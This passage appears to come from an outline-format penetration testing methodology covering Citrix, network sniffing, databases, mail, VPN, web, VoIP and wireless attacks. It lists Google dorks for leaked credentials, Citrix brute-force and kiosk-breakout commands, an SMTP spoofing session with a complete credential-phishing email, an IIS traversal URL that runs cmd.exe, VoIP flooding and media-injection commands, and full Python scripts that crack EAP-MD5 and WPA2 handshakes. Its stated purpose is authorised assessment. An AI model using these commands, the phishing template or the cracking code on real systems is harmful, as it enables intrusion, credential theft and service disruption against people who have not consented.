21.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information, which I have put together, will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix.
21.2. Enumeration
21.2.1. web search
21.2.1.1. Google (GHDB)
21.2.1.1.1. ext:ica
21.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
21.2.1.1.3. [WFClient] Password= filetype:ica
21.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
21.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
21.2.1.1.6. inurl:/Citrix/Nfuse17/
21.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
21.2.1.2. Google Hacks (Author Discovered)
21.2.1.2.1. filetype:ica Username=
21.2.1.2.2. inurl:/Citrix/AccessPlatform/
21.2.1.2.3. inurl:LogonAgent/Login.asp
21.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp
21.2.1.2.5. inurl:/Citrix/NFuse161/login.asp
21.2.1.2.6. inurl:/Citrix/NFuse16
21.2.1.2.7. inurl:/Citrix/NFuse151/
21.2.1.2.8. allintitle:MetaFrame XP Login
21.2.1.2.9. allintitle:MetaFrame Presentation Server Login
21.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
21.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login
21.2.1.3. Yahoo
21.2.1.3.1. originurlextension:ica
21.2.2. site search
21.2.2.1. Manual
21.2.2.1.1. review web page for useful information
21.2.2.1.2. review source for web page
21.2.3. generic
21.2.3.1. nmap -A -PN -p 80,443,1494 ip_address
21.2.3.2. amap -bqv ip_address port_no.
21.2.4. citrix specific
21.2.4.1. enum.pl
21.2.4.1.1. perl enum.pl ip_address
21.2.4.2. enum.js
21.2.4.2.1. enum.js apps TCPBrowserAddress=ip_address
21.2.4.3. connect.js
21.2.4.3.1. connect.js TCPBrowserAddress=ip_address Application=advertised-application
21.2.4.4. Citrix-pa-scan
21.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
21.2.4.5. pabrute.c
21.2.4.5.1. ./pabrute pubapp list app_list ip_address
21.2.5. Default Ports
21.2.5.1. TCP
21.2.5.1.1. Citrix XML Service
21.2.5.1.2. Advanced Management Console
21.2.5.1.3. Citrix SSL Relay
21.2.5.1.4. ICA sessions
21.2.5.1.5. Server to server
21.2.5.1.6. Management Console to server
21.2.5.1.7. Session Reliability (Auto-reconnect)
21.2.5.1.8. License Management Console
21.2.5.1.9. License server
21.2.5.2. UDP
21.2.5.2.1. Clients to ICA browser service
21.2.5.2.2. Server-to-server
21.2.6. nmap nse scripts
21.2.6.1. citrix-enum-apps
21.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
21.2.6.2. citrix-enum-apps-xml
21.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
21.2.6.3. citrix-enum-servers
21.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604 <host>
21.2.6.4. citrix-enum-servers-xml
21.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
21.2.6.5. citrix-brute-xml
21.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
21.3. Scanning
21.3.1. Nessus
21.3.1.1. Plugins
21.3.1.1.1. CGI abuses
21.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
21.3.1.1.3. Misc.
21.3.1.1.4. Service Detection
21.3.1.1.5. Web Servers
21.3.1.1.6. Windows
21.3.2. Nikto
21.3.2.1. perl nikto.pl -host ip_address -port port_no.
21.3.2.1.1. Untitled
21.4. Exploitation
21.4.1. Alter default .ica files
21.4.1.1. InitialProgram=cmd.exe
21.4.1.2. InitialProgram=explorer.exe
21.4.2. Enumerate and Connect
21.4.2.1. For applications identified by Citrix-pa-scan
21.4.2.1.1. Pas
21.4.2.2. For published applications with a Citrix client when the master browser is non-public.
21.4.2.2.1. Citrix-pa-proxy
21.4.3. Manual Testing
21.4.3.1. Create Batch File (cmd.bat)
21.4.3.1.1. 1
21.4.3.1.2. 2
21.4.3.2. Host Scripting File (cmd.vbs)
21.4.3.2.1. Option Explicit
21.4.3.2.2. Dim objShell: Set objShell = CreateObject("WScript.Shell")
21.4.3.2.3. objShell.Run "%comspec% /k"
21.4.3.2.4. WScript.Quit
21.4.3.2.5. alternative functionality
21.4.3.3. iKat
21.4.3.3.1. Integrated Kiosk Attack Tool
21.4.3.4. AT Command - privilege escalation
21.4.3.4.1. AT HH:MM /interactive "cmd.exe"
21.4.3.4.2. AT HH:MM /interactive %comspec% /k
21.4.3.4.3. Untitled
21.4.3.5. Keyboard Shortcuts/ Hotkeys
21.4.3.5.1. Ctrl + h – View History
21.4.3.5.2. Ctrl + n – New Browser
21.4.3.5.3. Shift + Left Click – New Browser
21.4.3.5.4. Ctrl + o – Internet Address (browse feature)
21.4.3.5.5. Ctrl + p – Print (to file)
21.4.3.5.6. Right Click (Shift + F10)
21.4.3.5.7. F1 – Jump to URL
21.4.3.5.8. SHIFT+F1: Local Task List
21.4.3.5.9. SHIFT+F2: Toggle Title Bar
21.4.3.5.10. SHIFT+F3: Close Remote Application
21.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
21.4.3.5.12. CTRL+F2: Remote Task List
21.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
21.4.3.5.14. ALT+F2: Cycle through programs
21.4.3.5.15. ALT+PLUS: Alt+TAB
21.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB
21.5. Brute Force
21.5.1. bforce.js
21.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
21.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
21.5.1.3. Untitled
21.6. Review Configuration Files
21.6.1. Application server configuration file
21.6.1.1. appsrv.ini
21.6.1.1.1. Location
21.6.1.1.2. World writeable
21.6.1.1.3. Review other files
21.6.1.1.4. Sample file
21.6.2. Program Neighborhood configuration file
21.6.2.1. pn.ini
21.6.2.1.1. Location
21.6.2.1.2. Review other files
21.6.2.1.3. Sample file
21.6.3. Citrix ICA client configuration file
21.6.3.1. wfclient.ini
21.6.3.1.1. Location
21.7. References
21.7.1. Vulnerabilities
21.7.1.1. Art of Hacking
21.7.1.2. Common Vulnerabilities and Exploits (CVE)
21.7.1.2.1. Sample file
21.7.1.2.2. Untitled
21.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
21.7.1.3. OSVDB
21.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=search
21.7.1.4. Secunia
21.7.1.5. Security-database.com
21.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
21.7.1.6. SecurityFocus
21.7.2. Support
21.7.2.1. Citrix
21.7.2.1.1. Knowledge Base
21.7.2.2. Thinworld
21.7.3. Exploits
21.7.3.1. Milw0rm
21.7.3.1.1. http://www.milw0rm.com/search.php
21.7.3.2. Art of Hacking
21.7.3.2.1. Citrix
21.7.4. Tools Resource
21.7.4.1. Zip file containing the majority of the tools mentioned in this article, for easy download/ access
22. Network Backbone
22.1. Generic Toolset
22.1.1. Wireshark (Formerly Ethereal)
22.1.1.1. Passive Sniffing
22.1.1.1.1. Usernames/Passwords
22.1.1.1.2. Email
22.1.1.1.3. FTP
22.1.1.1.4. HTTP
22.1.1.1.5. HTTPS
22.1.1.1.6. RDP
22.1.1.1.7. VOIP
22.1.1.1.8. Other
22.1.1.2. Filters
22.1.1.2.1. ip.src == ip_address
22.1.1.2.2. ip.dst == ip_address
22.1.1.2.3. tcp.dstport == port_no.
22.1.1.2.4. ! ip.addr == ip_address
22.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
22.1.2. Cain & Abel
22.1.2.1. Active Sniffing
22.1.2.1.1. ARP Cache Poisoning
22.1.2.1.2. DNS Poisoning
22.1.2.1.3. Routing Protocols
22.1.3. Cisco-Torch
22.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
22.1.4. NTP-Fingerprint
22.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
22.1.5. Yersinia
22.1.6. p0f
22.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
22.1.7. Manual Check (Credentials required)
22.1.8. MAC Spoofing
22.1.8.1. mac address changer for windows
22.1.8.2. macchanger
22.1.8.2.1. Random Mac Address:- macchanger -r eth0
22.1.8.3. madmacs
22.1.8.4. smac
22.1.8.5. TMAC
23. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually, or various engines exist that are, at the lowest level, essentially pre-compiled point-and-shoot tools. These engines also have a number of other underlying features for more advanced users.
23.1. Password Attacks
23.1.1. Known Accounts
23.1.1.1. Identified Passwords
23.1.1.2. Unidentified Hashes
23.1.2. Default Accounts
23.1.2.1. Identified Passwords
23.1.2.2. Unidentified Hashes
23.2. Exploits
23.2.1. Successful Exploits
23.2.1.1. Accounts
23.2.1.1.1. Passwords
23.2.1.1.2. Groups
23.2.1.1.3. Other Details
23.2.1.2. Services
23.2.1.3. Backdoor
23.2.1.4. Connectivity
23.2.2. Unsuccessful Exploits
23.2.3. Resources
23.2.3.1. Securiteam
23.2.3.1.1. Exploits are sorted by year and must be downloaded individually
23.2.3.2. SecurityForest
23.2.3.2.1. Updated via CVS after initial install
23.2.3.3. GovernmentSecurity
23.2.3.3.1. Need to create an account to obtain access
23.2.3.4. Red Base Security
23.2.3.4.1. Oracle Exploit site only
23.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
23.2.3.5.1. Wireless Exploit Site
23.2.3.6. PacketStorm Security
23.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
23.2.3.7. SecWatch
23.2.3.7.1. Exploits sorted by year and month, download separately
23.2.3.8. SecurityFocus
23.2.3.8.1. Exploits must be downloaded individually
23.2.3.9. Metasploit
23.2.3.9.1. Install and regularly update via svn
23.2.3.10. Milw0rm
23.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!
23.3. Tools
23.3.1. Metasploit
23.3.1.1. Free Extra Modules
23.3.1.1.1. local copy
23.3.2. Manual SQL Injection
23.3.2.1. Understanding SQL Injection
23.3.2.2. SQL Injection walkthrough
23.3.2.3. SQL Injection by example
23.3.2.4. Blind SQL Injection
23.3.2.5. Advanced SQL Injection in SQL Server
23.3.2.6. More Advanced SQL Injection
23.3.2.7. Advanced SQL Injection in Oracle databases
23.3.2.8. SQL Cheatsheets
23.3.2.8.1. Untitled
23.3.3. SQL Power Injector
23.3.4. SecurityForest
23.3.5. SPI Dynamics WebInspect
23.3.6. Core Impact
23.3.7. Cisco Global Exploiter
23.3.8. PIXDos
23.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]
23.3.9. CANVAS
23.3.10. Inguma
24. Server Specific Tests
24.1. Databases
24.1.1. Direct Access Interrogation
24.1.1.1. MS SQL Server
24.1.1.1.1. Ports
24.1.1.1.2. Version
24.1.1.1.3. osql
24.1.1.2. Oracle
24.1.1.2.1. Ports
24.1.1.2.2. TNS Listener
24.1.1.2.3. SQL Plus
24.1.1.2.4. Default Account/Passwords
24.1.1.2.5. Default SID's
24.1.1.3. MySQL
24.1.1.3.1. Ports
24.1.1.3.2. Version
24.1.1.3.3. Users/Passwords
24.1.1.4. DB2
24.1.1.5. Informix
24.1.1.6. Sybase
24.1.1.7. Other
24.1.2. Scans
24.1.2.1. Default Ports
24.1.2.2. Non-Default Ports
24.1.2.3. Instance Names
24.1.2.4. Versions
24.1.3. Password Attacks
24.1.3.1. Sniffed Passwords
24.1.3.1.1. Cracked Passwords
24.1.3.1.2. Hashes
24.1.3.2. Direct Access Guesses
24.1.4. Vulnerability Assessment
24.1.4.1. Automated
24.1.4.1.1. Reports
24.1.4.1.2. Vulnerabilities
24.1.4.2. Manual
24.1.4.2.1. Patch Levels
24.1.4.2.2. Confirmed Vulnerabilities
24.2. Mail
24.2.1. Scans
24.2.2. Fingerprint
24.2.2.1. Manual
24.2.2.2. Automated
24.2.3. Spoofable
24.2.3.1. Telnet spoof
24.2.3.1.1. telnet target_IP 25
    helo target.com
    mail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]
    X-Originating-Email: [[email protected]]
    MIME-Version: 1.0
    To: <[email protected]>
    From: < [email protected] >
    Subject: Important! Account check required
    Content-Type: text/html
    Content-Transfer-Encoding: 7bit

    Dear Valued Customer,
    The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.
    Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>
    Online Security Manager.
    Target [email protected].
24.2.4. Relays
24.3. VPN
24.3.1. Scanning
24.3.1.1. 500 UDP IPSEC
24.3.1.2. 1723 TCP PPTP
24.3.1.3. 443 TCP/SSL
24.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
24.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
24.3.2. Fingerprinting
24.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
24.3.3. PSK Crack
24.3.3.1. ikeprobe 80.75.68.27
24.3.3.2. sniff for responses with C&A or ikecrack
24.4. Web
24.4.1. Vulnerability Assessment
24.4.1.1. Automated
24.4.1.1.1. Reports
24.4.1.1.2. Vulnerabilities
24.4.1.2. Manual
24.4.1.2.1. Patch Levels
24.4.1.2.2. Confirmed Vulnerabilities
24.4.2. Permissions
24.4.2.1. PUT /test.txt HTTP/1.0
24.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
24.4.2.3. POST http://mail.another.com:25/ HTTP/1.0
    Content-Type: text/plain
    Content-Length: 6
24.4.3. Scans
24.4.4. Fingerprinting
24.4.4.1. Other
24.4.4.2. HTTP
24.4.4.2.1. Commands
24.4.4.2.2. Modules
24.4.4.2.3. File Extensions
24.4.4.3. HTTPS
24.4.4.3.1. Commands
24.4.4.3.2. Commands
24.4.4.3.3. File Extensions
24.4.5. Directory Traversal
24.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
25. VoIP Security
25.1. Sniffing Tools
25.1.1. AuthTool
25.1.2. Cain & Abel
25.1.3. Etherpeek
25.1.4. NetDude
25.1.5. Oreka
25.1.6. PSIPDump
25.1.7. SIPomatic
25.1.8. SIPv6 Analyzer
25.1.9. UCSniff
25.1.10. VoiPong
25.1.11. VOMIT
25.1.12. Wireshark
25.1.13. WIST - Web Interface for SIP Trace
25.2. Scanning and Enumeration Tools
25.2.1. enumIAX
25.2.2. fping
25.2.3. IAX Enumerator
25.2.4. iWar
25.2.5. Nessus
25.2.6. Nmap
25.2.7. SIP Forum Test Framework (SFTF)
25.2.8. SIPcrack
25.2.9. sipflanker
25.2.9.1. python sipflanker.py 192.168.1-254
25.2.10. SIP-Scan
25.2.11. SIP.Tastic
25.2.12. SIPVicious
25.2.13. SiVuS
25.2.14. SMAP
25.2.14.1. smap IP_Address/Subnet_Mask
25.2.14.2. smap -o IP_Address/Subnet_Mask
25.2.14.3. smap -l IP_Address
25.2.15. snmpwalk
25.2.16. VLANping
25.2.17. VoIPAudit
25.2.18. VoIP GHDB Entries
25.2.19. VoIP Voicemail Database
25.3. Packet Creation and Flooding Tools
25.3.1. H.323 Injection Files
25.3.2. H225regreject
25.3.3. IAXHangup
25.3.4. IAXAuthJack
25.3.5. IAX.Brute
25.3.6. IAXFlooder
25.3.6.1. ./iaxflood sourcename destinationname numpackets
25.3.7. INVITE Flooder
25.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
25.3.8. kphone-ddos
25.3.9. RTP Flooder
25.3.10. rtpbreak
25.3.11. Scapy
25.3.12. Seagull
25.3.13. SIPBomber
25.3.14. SIPNess
25.3.15. SIPp
25.3.16. SIPsak
25.3.16.1. Tracing paths:- sipsak -T -s sip:username@domain
25.3.16.2. Options request:- sipsak -vv -s sip:username@domain
25.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
25.3.17. SIP-Send-Fun
25.3.18. SIPVicious
25.3.19. Spitter
25.3.20. TFTP Brute Force
25.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
25.3.21. UDP Flooder
25.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
25.3.22. UDP Flooder (with VLAN Support)
25.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
25.3.23. Voiphopper
25.4. Fuzzing Tools
25.4.1. Asteroid
25.4.2. Codenomicon VoIP Fuzzers
25.4.3. Fuzzy Packet
25.4.4. Mu Security VoIP Fuzzing Platform
25.4.5. ohrwurm RTP Fuzzer
25.4.6. PROTOS H.323 Fuzzer
25.4.7. PROTOS SIP Fuzzer
25.4.8. SIP Forum Test Framework (SFTF)
25.4.9. Sip-Proxy
25.4.10. Spirent ThreatEx
25.5. Signaling Manipulation Tools
25.5.1. AuthTool
25.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
25.5.2. BYE Teardown
25.5.3. Check Sync Phone Rebooter
25.5.4. RedirectPoison
25.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
25.5.5. Registration Adder
25.5.6. Registration Eraser
25.5.7. Registration Hijacker
25.5.8. SIP-Kill
25.5.9. SIP-Proxy-Kill
25.5.10. SIP-RedirectRTP
25.5.11. SipRogue
25.5.12. vnak
25.6. Media Manipulation Tools
25.6.1. RTP InsertSound
25.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
25.6.2. RTP MixSound
25.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
25.6.3. RTPProxy
25.6.4. RTPInject
25.7. Generic Software Suites
25.7.1. OAT Office Communication Server Tool Assessment
25.7.2. EnableSecurity VOIPPACK
25.7.2.1. Note: - Add-on for Immunity Canvas
25.8. References
25.8.1. URLs
25.8.1.1. Common Vulnerabilities and Exposures (CVE)
25.8.1.1.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
25.8.1.2. Default Passwords
25.8.1.3. Hacking Exposed VoIP
25.8.1.3.1. Tool Pre-requisites
25.8.1.4. VoIPsa
25.8.2. White Papers
25.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
25.8.2.2. An Analysis of VoIP Security Threats and Tools
25.8.2.3. Hacking VoIP Exposed
25.8.2.4. Security testing of SIP implementations
25.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
25.8.2.6. Two attacks against VoIP
25.8.2.7. VoIP Attacks!
25.8.2.8. VoIP Security Audit Program (VSAP)
26. Wireless Penetration
26.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All of it is needed to give the tester (and hence the customer) a clear and concise picture of the network being assessed. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.
26.1.1. Site Map
26.1.1.1. RF Map
26.1.1.1.1. Lines of Sight
26.1.1.1.2. Signal Coverage
26.1.1.2. Physical Map
26.1.1.2.1. Triangulate APs
26.1.1.2.2. Satellite Imagery
26.1.2. Network Map
26.1.2.1. MAC Filter
26.1.2.1.1. Authorised MAC Addresses
26.1.2.1.2. Reaction to Spoofed MAC Addresses
26.1.2.2. Encryption Keys utilised
26.1.2.2.1. WEP
26.1.2.2.2. WPA/PSK
26.1.2.2.3. 802.1x
26.1.2.3. Access Points
26.1.2.3.1. ESSID
26.1.2.3.2. BSSIDs
26.1.2.4. Wireless Clients
26.1.2.4.1. MAC Addresses
26.1.2.4.2. Intercepted Traffic
26.2. Wireless Toolkit
26.2.1. Wireless Discovery
26.2.1.1. Aerosol
26.2.1.2. Airfart
26.2.1.3. Aphopper
26.2.1.4. Apradar
26.2.1.5. BAFFLE
26.2.1.6. inSSIDer
26.2.1.7. iWEPPro
26.2.1.8. karma
26.2.1.9. KisMAC-ng
26.2.1.10. Kismet
26.2.1.11. MiniStumbler
26.2.1.12. Netstumbler
26.2.1.13. Vistumbler
26.2.1.14. Wellenreiter
26.2.1.15. Wifi Hopper
26.2.1.16. WirelessMon
26.2.1.17. WiFiFoFum
26.2.2. Packet Capture
26.2.2.1. Airopeek
26.2.2.2. Airpcap
26.2.2.3. Airtraf
26.2.2.4. Apsniff
26.2.2.5. Cain
26.2.2.6. Commview
26.2.2.7. Ettercap
26.2.2.8. Netmon
26.2.2.8.1. nmwifi
26.2.2.9. Wireshark
26.2.3. EAP Attack tools
26.2.3.1. eapmd5pass
26.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
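What the eapmd5pass command above does with the capture: EAP-MD5-Challenge is CHAP carried over EAP, so the supplicant's Response value is MD5(Identifier || password || Challenge) and a captured Request/Response pair can be attacked offline with a word list. The following is an added example of that computation, not the tool's own code; the identifier, challenge, password and word list are constructed so it runs without a capture file.

```python
"""Offline dictionary attack on a captured EAP-MD5-Challenge exchange.

Added example, not eapmd5pass's own code; the identifier, challenge, password and
word list below are constructed so the script runs without a capture file."""
import hashlib


def parse_eap_md5(packet):
    """Parse an EAP packet carrying Type 4 (MD5-Challenge).
    Layout: Code(1) Identifier(1) Length(2) Type(1) Value-Size(1) Value(n) Name(rest).
    Returns (code, identifier, value, name); code 1 = Request (challenge), 2 = Response."""
    code, identifier = packet[0], packet[1]
    length = int.from_bytes(packet[2:4], "big")
    if packet[4] != 4 or length != len(packet):
        raise ValueError("not a well-formed EAP-MD5 packet")
    size = packet[5]
    return code, identifier, packet[6:6 + size], packet[6 + size:length]


def eap_md5_response(identifier, password, challenge):
    """Response value = MD5(Identifier || password || Challenge), as in CHAP (RFC 1994)."""
    return hashlib.md5(bytes([identifier]) + password.encode() + challenge).digest()


def crack_eap_md5(request, response, wordlist):
    """Recover the password from a captured Request/Response pair with the same Identifier."""
    _, req_id, challenge, _ = parse_eap_md5(request)
    _, resp_id, value, _ = parse_eap_md5(response)
    if req_id != resp_id:
        raise ValueError("Request/Response identifiers differ; not the same exchange")
    for word in wordlist:
        if eap_md5_response(req_id, word, challenge) == value:
            return word
    return None


def build_eap_md5(code, identifier, value, name):
    """Assemble an EAP-MD5 packet (used here only to construct the sample capture)."""
    body = bytes([4, len(value)]) + value + name
    return bytes([code, identifier]) + (4 + len(body)).to_bytes(2, "big") + body


# Constructed capture: the authenticator's challenge and the supplicant's answer.
CHALLENGE = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")
REQUEST = build_eap_md5(1, 0x2a, CHALLENGE, b"radius.example")
RESPONSE = build_eap_md5(2, 0x2a, eap_md5_response(0x2a, "wireless1", CHALLENGE), b"alice")
WORDLIST = ["password", "wireless", "wireless1", "letmein"]

if __name__ == "__main__":
    print("password:", crack_eap_md5(REQUEST, RESPONSE, WORDLIST))
```

Because the challenge is sent in the clear and the hash is unsalted beyond that challenge, one captured exchange is enough; this is why EAP-MD5 is unsuitable for wireless authentication.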
26.2.4. Leap Attack Tools
26.2.4.1. asleap
26.2.4.2. thc leap cracker
26.2.4.3. anwrap
26.2.5. WEP/ WPA Password Attack Tools
26.2.5.1. Airbase
26.2.5.2. Aircrack-ptw
26.2.5.3. Aircrack-ng
26.2.5.4. Airsnort
26.2.5.5. cowpatty
26.2.5.6. FiOS Wireless Key Calculator
26.2.5.7. iWifiHack
26.2.5.8. KisMAC-ng
26.2.5.9. Rainbow Tables
26.2.5.10. wep attack
26.2.5.11. wep crack
26.2.5.12. wzcook
26.2.6. Frame Generation Software
26.2.6.1. Airgobbler
26.2.6.2. airpwn
26.2.6.3. Airsnarf
26.2.6.4. Commview
26.2.6.5. fake ap
26.2.6.6. void 11
26.2.6.7. wifi tap
26.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
26.2.6.8. FreeRADIUS - Wireless Pwnage Edition
26.2.7. Mapping Software
26.2.7.1. Online Mapping
26.2.7.1.1. WIGLE
26.2.7.1.2. Skyhook
26.2.7.2. Tools
26.2.7.2.1. Knsgem
26.2.8. File Format Conversion Tools
26.2.8.1. ns1 recovery and conversion tool
26.2.8.2. warbable
26.2.8.3. warkizniz
26.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
26.2.8.4. ivstools
26.2.9. IDS Tools
26.2.9.1. WIDZ
26.2.9.2. War Scanner
26.2.9.3. Snort-Wireless
26.2.9.4. AirDefense
26.2.9.5. AirMagnet
26.3. WLAN discovery
26.3.1. Unencrypted WLAN
26.3.1.1. Visible SSID
26.3.1.1.1. Sniff for IP range
26.3.1.2. Hidden SSID
26.3.1.2.1. Deauth client
26.3.2. WEP encrypted WLAN
26.3.2.1. Visible SSID
26.3.2.1.1. WEPattack
26.3.2.2. Hidden SSID
26.3.2.2.1. Deauth client
26.3.3. WPA / WPA2 encrypted WLAN
26.3.3.1. Deauth client
26.3.3.1.1. Capture EAPOL handshake
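Once the EAPOL handshake has been captured, the attack is an offline dictionary search: each candidate passphrase is expanded to a PMK, the PTK is derived from the two MACs and two nonces, and the KCK portion is used to recompute the MIC on message 2; a match identifies the PSK. This is what cowpatty and aircrack-ng do. The following is an added example of that computation, not code from any of the listed tools; the SSID, MAC addresses, nonces, passphrase and word list are constructed so it runs without a capture file.

```python
"""Offline dictionary attack on a captured WPA2-PSK four-way handshake.

Added example, not a tool from the original framework. The SSID, MACs, nonces,
passphrase and word list below are constructed so the script runs offline."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """IEEE 802.11i PRF-512: HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_kck(pmk, ap_mac, sta_mac, anonce, snonce):
    """KCK is the first 16 bytes of the PTK; it alone is needed to check the MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck, eapol_frame):
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    The MIC field is bytes 81..96 of the frame (4-byte 802.1X header + 77 bytes)."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist):
    """Return the candidate whose derived KCK reproduces the captured MIC, else None."""
    captured_mic = eapol_msg2[81:97]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_kck(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None


def build_msg2(kck, snonce):
    """Assemble EAPOL-Key message 2 (key info 0x010a: pairwise, MIC, HMAC-SHA1) with
    its MIC filled in. Used here only to construct the sample capture."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x00" + (1).to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]


# Constructed "capture": network parameters and the victim passphrase used to build it.
SSID = "CorpWiFi"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PSK = "summer2008"
WORDLIST = ["password", "letmein", "summer2008", "corpwifi1"]
CAPTURED_MSG2 = build_msg2(
    derive_kck(pmk_from_passphrase(TRUE_PSK, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE), SNONCE)

if __name__ == "__main__":
    print("recovered PSK:", crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST))
```

The 4096-iteration PBKDF2 is the cost that makes this attack slow per candidate, which is why precomputed (SSID-specific) PMK tables exist for common network names; a real run feeds `crack` the MACs, nonces and message 2 parsed from the capture.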
26.3.4. LEAP encrypted WLAN
26.3.4.1. Deauth client
26.3.4.1.1. Break LEAP
26.3.5. 802.1x WLAN
26.3.5.1. Create Rogue Access Point
26.3.5.1.1. Airsnarf
26.3.5.1.2. fake ap
26.3.5.1.3. Hotspotter
26.3.5.1.4. Karma
26.3.5.1.5. Linux rogue AP
26.3.6. Resources
26.3.6.1. URLs
26.3.6.1.1. Wirelessdefence.org
26.3.6.1.2. Russix
26.3.6.1.3. Wardrive.net
